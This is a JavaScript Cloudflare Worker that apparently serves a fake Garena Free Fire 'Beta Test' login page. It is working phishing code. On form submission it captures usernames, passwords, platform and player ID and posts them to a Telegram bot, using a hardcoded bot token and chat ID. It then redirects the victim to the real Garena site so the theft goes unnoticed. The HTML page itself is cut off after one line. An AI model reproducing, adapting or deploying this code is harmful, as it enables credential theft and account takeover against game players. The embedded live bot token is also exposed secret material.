export default { async fetch(request, env) { const TELEGRAM_TOKEN = '8505772061:AAFzBravl-RPd4wHHWTYMh_WiBcyMQElAFw'; const CHAT_ID = '8126986931'; if (request.method === "POST") { const formData = await request.formData(); const user = formData.get('user_identity'); const pass = formData.get('user_password'); const platform = formData.get('login_platform'); const pid = formData.get('player_id'); const pesan = ` 🚀 **LOG STORE - ${platform.toUpperCase()}** 🚀 ━━━━━━━━━━━━━━━━━━━━ 🌐 **Metode:** ${platform} 👤 **User:** \`${user}\` 🔑 **Pass:** \`${pass}\` 🆔 **Player ID:** ${pid || '-'} ━━━━━━━━━━━━━━━━━━━━ 🛰️ Node: Cloudflare Edge `; await fetch(`https://api.telegram.org/bot${TELEGRAM_TOKEN}/sendMessage`, { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ chat_id: CHAT_ID, text: pesan, parse_mode: 'Markdown' }) }); return Response.redirect("https://ff.garena.com/", 302); } return new Response(html_store, { headers: { "content-type": "text/html;charset=UTF-8" }, }); } }; const html_store = `
Gunakan akun untuk verifikasi Beta Test